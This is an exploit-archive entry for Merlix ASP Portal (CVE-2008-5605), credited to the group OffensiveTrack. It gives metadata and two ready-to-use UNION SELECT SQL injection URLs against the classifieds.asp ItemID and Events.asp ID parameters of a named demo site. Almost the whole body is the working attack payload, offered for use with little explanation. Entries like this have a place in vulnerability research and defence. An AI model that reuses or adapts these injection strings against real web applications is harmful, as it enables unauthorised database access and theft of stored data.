ASP Portal - Multiple SQL Injections
Author: AlpHaNiX
type: webapps
platform: asp
port:
date_added: 2008-12-04
date_updated: 2017-01-04
verified: 1
codes: OSVDB-50845;CVE-2008-5605;OSVDB-50844
tags:
aliases:
screenshot_url:
application_url:
###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################
---------------------------- Tunisian Muslim ------------------------------
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Merlix ASP PORTAL
#download : null
#Demo : http://demo.merlix.com/portal/
#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory
#Greetz For Synex
###########################################################################
# milw0rm.com [2008-12-05]